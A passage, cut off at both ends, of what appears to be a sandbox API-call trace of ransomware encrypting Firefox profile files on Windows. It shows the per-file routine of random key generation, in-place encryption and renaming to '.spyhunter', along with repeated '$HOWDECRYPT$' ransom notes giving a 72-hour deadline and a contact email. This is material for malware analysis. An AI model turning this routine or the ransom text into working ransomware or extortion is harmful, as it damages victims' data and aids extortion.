(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned 106 [0150.611] StrStrW (lpFirst="marionette.log", lpSrch=".txt") returned 0x0 [0150.611] GetProcessHeap () returned 0x2c0000 [0150.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.611] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed24*=0x39, lpOverlapped=0x0) returned 1 [0150.612] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.612] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed24*=0x39, lpOverlapped=0x0) returned 1 [0150.614] GetProcessHeap () returned 0x2c0000 [0150.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.614] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.614] WriteFile (in: hFile=0x178, lpBuffer=0x57ed64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x57ed64*, lpNumberOfBytesWritten=0x57ed24*=0x4, lpOverlapped=0x0) returned 1 [0150.614] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed24*=0x30, lpOverlapped=0x0) returned 1 [0150.614] CloseHandle (hObject=0x178) returned 1 [0150.614] GetProcessHeap () returned 0x2c0000 [0150.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.614] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.spyhunter") returned 116 [0150.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.spyhunter")) returned 1 [0150.615] GetProcessHeap () returned 0x2c0000 [0150.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.615] GetProcessHeap () returned 0x2c0000 [0150.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.615] GetProcessHeap () returned 0x2c0000 [0150.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0990 | out: hHeap=0x2c0000) returned 1 [0150.615] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed68 | out: pbBuffer=0x57ed68) returned 1 [0150.615] GetProcessHeap () returned 0x2c0000 [0150.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.615] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed60*=0x30) returned 1 [0150.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.616] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned 106 [0150.616] StrStrW (lpFirst="localstore.rdf", lpSrch=".txt") returned 0x0 [0150.616] GetProcessHeap () returned 0x2c0000 [0150.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.616] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed24*=0x501, lpOverlapped=0x0) returned 1 [0150.646] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffaff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.646] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x501, lpNumberOfBytesWritten=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed24*=0x501, lpOverlapped=0x0) returned 1 [0150.646] GetProcessHeap () returned 0x2c0000 [0150.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.646] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.646] WriteFile (in: hFile=0x178, lpBuffer=0x57ed64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x57ed64*, lpNumberOfBytesWritten=0x57ed24*=0x4, lpOverlapped=0x0) returned 1 [0150.647] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed24*=0x30, lpOverlapped=0x0) returned 1 [0150.647] CloseHandle (hObject=0x178) returned 1 [0150.647] GetProcessHeap () returned 0x2c0000 [0150.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.647] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.spyhunter") returned 116 [0150.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.spyhunter")) returned 1 [0150.648] GetProcessHeap () returned 0x2c0000 [0150.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.648] GetProcessHeap () returned 0x2c0000 [0150.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.648] GetProcessHeap () returned 0x2c0000 [0150.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0740 | out: hHeap=0x2c0000) returned 1 [0150.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.649] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.649] WriteFile (in: hFile=0x178, lpBuffer=0x57ec97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57edc0, lpOverlapped=0x0 | out: lpBuffer=0x57ec97*, lpNumberOfBytesWritten=0x57edc0*=0x127, lpOverlapped=0x0) returned 1 [0150.650] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.650] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57edc0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57edc0*=0x2ac, lpOverlapped=0x0) returned 1 [0150.650] CloseHandle (hObject=0x178) returned 1 [0150.650] GetProcessHeap () returned 0x2c0000 [0150.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff49e8 | out: hHeap=0x2c0000) returned 1 [0150.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.651] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.651] WriteFile (in: hFile=0x178, lpBuffer=0x57ec93*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x57ec93*, lpNumberOfBytesWritten=0x57edbc*=0x127, lpOverlapped=0x0) returned 1 [0150.652] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.652] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57edbc*=0x2ac, lpOverlapped=0x0) returned 1 [0150.652] CloseHandle (hObject=0x178) returned 1 [0150.652] GetProcessHeap () returned 0x2c0000 [0150.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4880 | out: hHeap=0x2c0000) returned 1 [0150.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed58 | out: pbBuffer=0x57ed58) returned 1 [0150.652] GetProcessHeap () returned 0x2c0000 [0150.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed50*=0x30) returned 1 [0150.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0150.653] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".txt") returned 0x0 [0150.653] GetProcessHeap () returned 0x2c0000 [0150.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.653] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.735] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.735] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.736] GetProcessHeap () returned 0x2c0000 [0150.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.736] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.736] WriteFile (in: hFile=0x178, lpBuffer=0x57ed54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x57ed54*, lpNumberOfBytesWritten=0x57ed14*=0x4, lpOverlapped=0x0) returned 1 [0150.737] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed14*=0x30, lpOverlapped=0x0) returned 1 [0150.737] CloseHandle (hObject=0x178) returned 1 [0150.737] GetProcessHeap () returned 0x2c0000 [0150.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.737] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.spyhunter") returned 161 [0150.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.spyhunter")) returned 1 [0150.821] GetProcessHeap () returned 0x2c0000 [0150.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.821] GetProcessHeap () returned 0x2c0000 [0150.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.822] GetProcessHeap () returned 0x2c0000 [0150.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7c48 | out: hHeap=0x2c0000) returned 1 [0150.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed58 | out: pbBuffer=0x57ed58) returned 1 [0150.822] GetProcessHeap () returned 0x2c0000 [0150.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed50*=0x30) returned 1 [0150.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.823] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0150.823] StrStrW (lpFirst="cookies.sqlite", lpSrch=".txt") returned 0x0 [0150.823] GetProcessHeap () returned 0x2c0000 [0150.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.823] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.906] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.906] GetProcessHeap () returned 0x2c0000 [0150.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.906] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.906] WriteFile (in: hFile=0x178, lpBuffer=0x57ed54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x57ed54*, lpNumberOfBytesWritten=0x57ed14*=0x4, lpOverlapped=0x0) returned 1 [0151.270] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed14*=0x30, lpOverlapped=0x0) returned 1 [0151.270] CloseHandle (hObject=0x178) returned 1 [0151.271] GetProcessHeap () returned 0x2c0000 [0151.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.271] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.spyhunter") returned 116 [0151.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.spyhunter")) returned 1 [0151.272] GetProcessHeap () returned 0x2c0000 [0151.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.272] GetProcessHeap () returned 0x2c0000 [0151.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.272] GetProcessHeap () returned 0x2c0000 [0151.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc03c8 | out: hHeap=0x2c0000) returned 1 [0151.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.273] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.273] WriteFile (in: hFile=0x178, lpBuffer=0x57ec87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57edb0, lpOverlapped=0x0 | out: lpBuffer=0x57ec87*, lpNumberOfBytesWritten=0x57edb0*=0x127, lpOverlapped=0x0) returned 1 [0151.274] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.274] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57edb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57edb0*=0x2ac, lpOverlapped=0x0) returned 1 [0151.274] CloseHandle (hObject=0x178) returned 1 [0151.275] GetProcessHeap () returned 0x2c0000 [0151.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2eca8 | out: hHeap=0x2c0000) returned 1 [0151.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed50 | out: pbBuffer=0x57ed50) returned 1 [0151.275] GetProcessHeap () returned 0x2c0000 [0151.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, 